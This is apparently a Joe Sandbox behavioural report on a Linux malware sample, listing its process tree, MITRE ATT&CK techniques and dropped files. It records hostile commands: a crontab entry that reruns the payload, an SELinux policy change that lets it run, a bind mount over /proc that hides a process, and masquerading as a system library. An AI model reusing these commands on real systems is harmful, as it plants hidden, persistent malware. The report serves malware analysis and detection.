Chronological Activities

Analysis Process: bash PID: 6333, Parent PID: 6261

General

Start time (UTC):	02:56:44
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 6334, Parent PID: 6333

General

Start time (UTC):	02:56:44
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 6335, Parent PID: 6333

General

Start time (UTC):	02:56:44
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 6336, Parent PID: 6333

General

Start time (UTC):	02:56:44
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6337, Parent PID: 6261

General

Start time (UTC):	02:56:44
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: bash PID: 6337, Parent PID: 6261

General

Start time (UTC):	02:56:44
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6340, Parent PID: 6261

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: renice PID: 6340, Parent PID: 6261

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/bin/renice
Arguments:	renice -20 6261
File size:	14568 bytes
MD5 hash:	3686c936ed1df483498266a36871cb5b

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6341, Parent PID: 6261

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: mount PID: 6341, Parent PID: 6261

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/6261
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6365, Parent PID: 6261

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: service PID: 6365, Parent PID: 6261

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 6366, Parent PID: 6365

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 6366, Parent PID: 6365

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 6367, Parent PID: 6365

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 6367, Parent PID: 6365

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 6368, Parent PID: 6365

General

Start time (UTC):	02:56:47
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6368, Parent PID: 6365

General

Start time (UTC):	02:56:47
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 6380, Parent PID: 6365

General

Start time (UTC):	02:56:47
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 6381, Parent PID: 6380

General

Start time (UTC):	02:56:47
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6381, Parent PID: 6380

General

Start time (UTC):	02:56:47
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 6382, Parent PID: 6380

General

Start time (UTC):	02:56:47
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 6382, Parent PID: 6380

General

Start time (UTC):	02:56:47
Start date (UTC):	02/11/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 6365, Parent PID: 6261

General

Start time (UTC):	02:56:49
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6384, Parent PID: 6261

General

Start time (UTC):	02:56:49
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: systemctl PID: 6384, Parent PID: 6261

General

Start time (UTC):	02:56:49
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: dash PID: 6275, Parent PID: 4331

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6275, Parent PID: 4331

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.9rMvpBJybs /tmp/tmp.uaBIl5G6jS /tmp/tmp.4dkKp3sm3s
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: dash PID: 6276, Parent PID: 4331

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6276, Parent PID: 4331

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.9rMvpBJybs /tmp/tmp.uaBIl5G6jS /tmp/tmp.4dkKp3sm3s
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: systemd PID: 6303, Parent PID: 6302

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6303, Parent PID: 6302

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 6308, Parent PID: 6307

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6308, Parent PID: 6307

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 6311, Parent PID: 1

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: System.mod PID: 6311, Parent PID: 1

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: System.mod PID: 6315, Parent PID: 6311

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: System.mod PID: 6315, Parent PID: 6311

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: systemd PID: 6324, Parent PID: 1

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: System.mod PID: 6324, Parent PID: 1

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: System.mod PID: 6329, Parent PID: 6324

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: System.mod PID: 6329, Parent PID: 6324

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: udisksd PID: 6353, Parent PID: 799

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6353, Parent PID: 799

General

Start time (UTC):	02:56:46
Start date (UTC):	02/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 6383, Parent PID: 1

General

Start time (UTC):	02:56:49
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 6383, Parent PID: 1

General

Start time (UTC):	02:56:49
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 6411, Parent PID: 6383

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 6412, Parent PID: 6411

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 6412, Parent PID: 6411

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6413, Parent PID: 6412

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 6413, Parent PID: 6412

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 6414, Parent PID: 6413

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6414, Parent PID: 6413

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6418, Parent PID: 6414

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6418, Parent PID: 6414

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: systemd PID: 6432, Parent PID: 1

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 6432, Parent PID: 1

General

Start time (UTC):	02:57:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 6472, Parent PID: 6432

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 6481, Parent PID: 6472

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 6481, Parent PID: 6472

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6482, Parent PID: 6481

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 6482, Parent PID: 6481

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 6483, Parent PID: 6482

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6483, Parent PID: 6482

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6487, Parent PID: 6483

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6487, Parent PID: 6483

General

Start time (UTC):	02:58:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: systemd PID: 6510, Parent PID: 1

General

Start time (UTC):	02:58:02
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 6510, Parent PID: 1

General

Start time (UTC):	02:58:02
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report Ww0lpzmYHO.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/etc/.walk

/etc/32676

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

Linux Analysis Report
Ww0lpzmYHO.elf